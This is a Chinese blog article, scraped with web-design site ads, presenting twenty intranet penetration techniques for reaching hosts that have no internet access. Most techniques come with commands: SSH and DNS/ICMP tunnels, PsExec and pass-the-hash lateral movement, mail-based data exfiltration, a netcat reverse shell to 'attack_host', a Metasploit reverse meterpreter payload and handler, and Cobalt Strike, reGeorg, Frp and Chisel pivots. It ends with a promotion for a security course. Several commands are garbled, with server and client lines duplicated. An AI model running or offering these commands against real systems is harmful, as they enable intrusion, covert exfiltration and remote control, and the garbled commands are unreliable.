焦作市网站建设_网站建设公司_留言板_seo优化
2025/12/27 10:16:53 网站建设 项目流程

内网渗透骚操作:20招教你突破“与世隔绝”的目标主机


内网渗透,那可是个技术活儿,尤其是当目标主机“与世隔绝”,压根儿不让上网的时候。这时候,就得拿出点真本事,各种奇技淫巧、工具轮番上阵。今儿个,咱就来聊聊,如何在目标主机不出网的情况下,还能把它“拿下”的20种骚操作,保证让您大开眼界!

一、隧道与代理:内网穿梭的“任意门”
(一)端口转发:流量乾坤大挪移

端口转发,就像是给流量开了个“任意门”,让它在不同的主机之间穿梭。

  1. 1. 本地端口转发(Local Port Forwarding)

    简单来说,就是把目标主机上的服务“搬”到咱自己电脑上。比如,想访问内网里的数据库服务器,可以用SSH端口转发:

    bash ssh -L 3306:192.168.1.100:3306 user@middle_host

    这条命令一敲,目标主机192.168.1.100的MySQL服务(3306端口)就跟咱本地的3306端口“喜结连理”了,直接访问本地端口就成!

  2. 2. 远程端口转发(Remote Port Forwarding)

    要是目标主机“害羞”,不肯主动找咱,那就让它把流量“反弹”给咱。举个栗子:

    bash ssh -R 8080:localhost:80 user@attack_host

    这下,目标主机上的HTTP服务(80端口)就乖乖地跑到咱电脑的8080端口上“做客”了。

(二)代理隧道:网络限制?不存在的!

代理隧道,顾名思义,就是通过代理服务器,绕过各种网络限制。

  1. 3. Socks代理

    有了Socks代理,就像给咱的流量穿上了“隐身衣”。比如,用proxychains配合代理服务器,扫描内网主机:

    bash proxychains nmap -sT -Pn internal_host

    这样,咱就能神不知鬼不觉地摸清内网的底细了。

  2. 4. HTTP代理

    把代理脚本“藏”在目标服务器上,就能建立起一条秘密通道。reGeorg和Proxifier就是干这事儿的好手。

(三)DNS隧道:在DNS的海洋里“偷渡”

DNS隧道,就是把数据“伪装”成DNS请求,偷偷地溜出去。就算HTTP、HTTPS这些“大路”被堵死了,DNS这条“小道”往往还能走通。iodine和dnscat2是常用的DNS隧道工具。

  1. 5. 使用iodine构建DNS隧道

    在攻击者主机上启动DNS服务器:

    bash iodine -f -c -P password example.com

    在目标主机上运行客户端:

    bash iodine -f -c -P password example.com

    数据就这样在DNS的“掩护”下,悄悄地完成了传输。

(四)ICMP隧道:Ping也能传数据?

ICMP隧道,就是利用ICMP流量(比如Ping)来传输数据,绕过防火墙。有时候,TCP/UDP流量被“拒之门外”,但ICMP可能还“畅通无阻”。Ptunnel和icmpsh是常用的ICMP隧道工具。

  1. 6. 使用Ptunnel构建ICMP隧道

    在攻击者主机上启动Ptunnel:

    bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

    在目标主机上启动客户端:

    bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

    数据就这样在ICMP的“庇护”下,安全地完成了传输。

二、内网服务:突破的“隐秘角落”
(五)内网横向移动:步步为营,扩大战果

内网横向移动,就是利用内网里的“薄弱环节”,比如弱口令、漏洞啥的,一步步“蚕食”其他主机。

  1. 7. 使用PsExec远程执行命令

    bash PsExec.exe \192.168.1.100 -u user -p password cmd.exe

    PsExec一出马,就能在其他内网主机上“为所欲为”了。

  2. 8. Pass-the-Hash攻击

    有了哈希值,就不用密码也能“畅行无阻”。比如:

    bash pth-winexe -U user%hash //192.168.1.100 cmd.exe

    pth-winexe一出手,Pass-the-Hash攻击轻松搞定。

(六)利用内网服务:另辟蹊径,出奇制胜

目标主机上可能藏着一些“宝藏”,比如数据库服务、文件共享服务,利用它们,说不定就能找到突破口。

  1. 9. 利用内网数据库服务

    通过数据库服务,也能和外面的世界“搭上线”。比如,利用MySQL的LOAD DATA INFILE功能,把数据写到文件里,再想办法“运”出去。

  2. 10. 利用SMB隧道

    SMB隧道,就是利用内网文件共享服务来传输数据。比如:

    bash smbclient //192.168.1.100/share -U user

    SMB客户端一连,内网文件共享服务就“尽在掌握”了。

(七)邮件、FTP等协议:曲线救国,柳暗花明

有些内网环境,虽然封了HTTP/HTTPS,但可能还留着其他“后门”,比如邮件、FTP。

  1. 11. 使用SMTP协议发送电子邮件

    用SMTP协议发邮件,把数据“寄”出去。比如:

    bash echo "Data to exfiltrate" | mail -s "Subject" user@example.com

    数据就这样“飞”出去了。

  2. 12. 使用FTP上传或下载文件

    用FTP上传或下载文件,也是个不错的选择。比如:

    bash ftp -i 192.168.1.100

    文件就这样“搬家”了。

三、反向连接:让目标主机“主动投怀送抱”
(八)反向Shell和反向隧道:主动出击,建立连接

反向Shell和反向隧道,就是让目标主机主动来找咱,建立起“爱的桥梁”。

  1. 13. 使用Netcat建立反向Shell

    在目标主机上运行:

    bash nc -e /bin/sh attack_host 4444

    在攻击者主机上监听:

    bash nc -l -p 4444

    Netcat一出手,反向Shell就到手。

  2. 14. 使用Metasploit建立反向Shell

    在目标主机上运行:

    bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_host LPORT=4444 -f exe -o shell.exe

    在攻击者主机上运行:

    bash msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost attack_host; set lport 4444; run"

    Metasploit一出马,反向Shell更是不在话下。

(九)Cobalt Strike的中转功能: “隐形的翅膀”

Cobalt Strike,内网渗透的“神器”,它的Socks代理功能,能让目标主机在“与世隔绝”的情况下,也能通过中转,建立起代理连接。

  1. 15. 使用Cobalt Strike的Socks代理

    在目标主机上运行Beacon,通过Socks代理功能建立代理连接。例如:

    bash beacon> socks 8080

    在攻击者主机上使用代理工具连接到目标主机。

(十)SMB Beacon:隐蔽通信的“秘密武器”

SMB Beacon,Cobalt Strike里的“特种兵”,通过Windows命名管道通信,隐蔽性极高。

  1. 16. 使用SMB Beacon

    创建一个SMB的Listener后,可以在主Beacon上链接或断开子Beacon。例如:

    bash beacon> smb 192.168.1.100 445

    通过SMB Beacon建立连接。

四、工具与脚本:渗透利器,各显神通
(十一)reGeorg和Neo-reGeorg:代理隧道的“双子星”

reGeorg,代理隧道工具的“老大哥”,把脚本上传到目标服务器的网站目录下,就能建立起代理隧道。Neo-reGeorg更是在此基础上加了“buff”,数据传输更隐蔽。

  1. 17. 使用reGeorg建立代理隧道

    在目标服务器上上传reGeorg脚本:

    bash curl -o proxy.py http://example.com/reGeorg.py

    在攻击者主机上运行代理客户端:

    bash python proxy.py -s http://192.168.1.100/reGeorg.py -l 8080 -r 192.168.1.200:80

    通过reGeorg建立代理隧道。

(十二)Pystinger:WebShell的“好搭档”

Pystinger,通过WebShell实现内网SOCK4代理,端口映射,让目标主机在“与世隔绝”的情况下也能“重见天日”。

  1. 18. 使用Pystinger建立代理

    将stinger_server.exe上传到目标服务器,并在公网VPS上运行stinger_client,建立代理连接。例如:

    bash python stinger_client.py -s 192.168.1.100 -p 8080 -l 8081

    通过Pystinger建立代理连接。

(十三)Frp:内网穿透的“瑞士军刀”

Frp,内网穿透工具的“扛把子”,在目标主机“与世隔绝”的情况下,通过已控的双网卡内网服务器,打通一条“生命通道”。

  1. 19. 使用Frp建立内网穿透

    在目标主机上运行Frp客户端:

    bash ./frpc -c frpc.ini

    在攻击者主机上运行Frp服务端:

    bash ./frps -c frps.ini

    通过Frp建立内网穿透。

(十四)其他工具和脚本:渗透工具箱的“百宝囊”

除了上面这些,还有很多其他的工具和脚本,也能在内网渗透中“大显身手”。

  1. 20. 使用Chisel建立隧道

    Chisel,轻量级隧道工具,内网穿透的“小能手”。比如:

    在目标主机上运行:

    bash ./chisel client --reverse attack_host:8080 R:8081:localhost:80

    在攻击者主机上运行:

    bash ./chisel server --port 8080 --reverse

    通过Chisel建立隧道。

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。


1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询